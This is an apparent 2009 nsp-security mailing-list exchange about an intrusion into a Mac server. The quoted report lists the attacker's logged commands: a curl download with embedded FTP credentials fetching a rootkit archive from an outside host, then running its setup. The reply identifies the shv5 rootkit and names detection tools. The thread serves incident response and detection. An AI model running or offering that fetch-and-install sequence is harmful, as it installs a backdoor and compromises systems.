[nsp-sec] MAC root kit found on www.funmangames.com 208.113.230.135- ASN 26347

[Smith, Donald]

That is shv5 a unix root kit. They may have updated it to complile on macs but its been around for years.
It can be removed.
Rootkit hunter can detect it. http://www.rootkit.nl/articles/rootkit_hunter_changelog.html
chkrootkit also finds it. http://www.chkrootkit.org

Primarily it puts up a back door ssh and trojans several binaries.




Security through obscurity WORKS against some worms and ssh attacks:)
Donald.Smith at qwest.com gcia 

> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net 
> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of 
> Joel Rosenblatt
> Sent: Monday, March 30, 2009 12:01 PM
> To: nsp-security at puck.nether.net
> Subject: [nsp-sec] MAC root kit found on www.funmangames.com 
> 208.113.230.135- ASN 26347
> 
> ----------- nsp-security Confidential --------
> 
> Hi,
> 
> We had a break in of a Mac server (bad root password .. duh) 
> - upon going through the log of commands run, we came across
> 
> curl -O ftp://haddd:itrules@www.funmangames.com/kit5.tar
> 
> tar xzf kit5.tar
> 
> ls -a
> 
> cd shv5
> 
> ./setup abelha 54
> 
> It appears to be a Mac root kit.
> 
> AS      | IP               | AS Name
> 26347   | 208.113.230.135  | DREAMHOST-AS - New Dream Network, LLC
> 
> I wonder if it could be removed.
> 
> Thanks,
> Joel Rosenblatt
> 
> Joel Rosenblatt, Manager Network & Computer Security
> Columbia Information Security Office (CISO)
> Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
> http://www.columbia.edu/~joel
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the 
> nsp-security
> community. Confidentiality is essential for effective 
> Internet security counter-measures.
> _______________________________________________
> 
>